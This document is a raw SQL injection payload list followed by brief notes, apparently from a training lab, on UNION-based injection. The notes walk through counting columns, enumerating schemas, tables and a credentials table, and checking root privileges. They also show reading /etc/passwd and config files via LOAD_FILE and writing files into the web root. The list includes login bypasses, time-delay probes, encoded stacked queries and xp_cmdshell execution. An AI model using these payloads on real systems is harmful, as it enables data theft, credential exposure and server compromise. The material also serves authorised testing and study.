<>"'%;)(&+
|
!
?
/
//
//*
'
' --
(
)
*|
*/*
&
0
031003000270000
0 or 1=1
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
'%20OR
as
asc
a' waitfor delay '0:0:10'--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
delete
desc
distinct
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec(@s)
'; exec ('sel' + 'ect us' + 'er')
exec sp
'; execute immediate 'sel' || 'ect us' || 'er'
exec xp
'; exec xp_regread
' group by userid having 1=1--
handler
having
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1--
'/**/or/**/1/**/=/**/1
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
‘ or 3=3 --
' or '7659'='7659
or a=a
or a = a
' or 'a'='a
' or a=a--
') or ('a'='a
" or "a"="a
) or (a=a
order by
' or (EXISTS)
or isNULL(1/0) /*
" or isNULL(1/0) /*
' or 'something' like 'some%'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or 'unusual' = 'unusual'
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' or 'whatever' in ('whatever')
' -- &password=
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
select
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
'sqlvuln
'+sqlvuln
(sqlvuln)
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' union all select @@version--
' union select
uni/**/on sel/**/ect
' UNION SELECT
' union select 1,load_file('/etc/passwd'),1,1,1;
) union select * from information_schema.tables;
' union select * from users where login = char(114,111,111,116);
update
'||UTL_HTTP.REQUEST
,@variable
@variable
@var select @var as var into temp end --
\x27UNION SELECT
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
ý or 1=1 --
admin' or '1'='1
' or 1=1
adam' or '1'='1
' OR id = 5) -- - : just on the username part
select emp_no, birth_date, first_name, last_name, gender, hire_date from employees UNION SELECT dept_no, dept_name, NULL, NULL, NULL, NULL from departments;
find the number of columns on the tables then use NULL to "make up for it"
select count(tem.emp_no) from (select emp_no, birth_date, first_name, last_name, gender, hire_date from employees UNION SELECT dept_no, dept_name, NULL, NULL, NULL, NULL from departments ) as tem;
' order by 1-- -
cn' UNION select 1,2,3-- -
1,2,3 is the amount to guess the number of columns
cn' UNION select 1,2,3,4-- -
cn' UNION select 1,2,3,@@version-- -
INFORMATION_SCHEMA Database
To pull data from tables using UNION SELECT, we need to form our SELECT queries properly. To do so, we need the following information:
List of databases
List of tables within each database
List of columns within each table
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
this get the current database the webapp is using cn' UNION select 1,database(),2,3-- -
this gets the list of tables for the given databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- -
READ FILES
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - Have to view page source
WRITE FILES
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
cn' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
cn' UNION select 1,2,3,4,5-- -
cn' UNION select 1,LOAD_FILE("/etc/passwd"),2,3,4-- -
cn' UNION select 1,user(),2,3,4-- -
cn' UNION SELECT 1, super_priv, 3, 4, 5 FROM mysql.user WHERE user="root"-- -
cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/config.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.php"),2,3,4-- -
cn' UNION select 1,LOAD_FILE("/var/www/html/index.php"),2,3,4-- -
cn' UNION select 1,LOAD_FILE("/var/www/html/config.php"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/var/www/html/index.php"),2,3,4-- -
cn' UNION select 1,LOAD_FILE("/etc/apache2/httpd.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/apache2/apache2.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/httpd/httpd.conf"),2,3,4-- - cn' UNION select 1,LOAD_FILE("/etc/httpd/conf/httpd.conf"),2,3,4-- -
cn' UNION select 1,LOAD_FILE("/var/www/html/dashboard/dashboard.css"),2,3,4-- -
cn' union select 1,'file written successfully!',3,4,5 into outfile '/var/www/html/proof.txt'-- - cn' union select 1,'file written successfully!',3,4,5 into outfile '/tmp/proof.txt'-- - cn' UNION select 1,LOAD_FILE("/tmp/proof.txt"),2,3,4-- -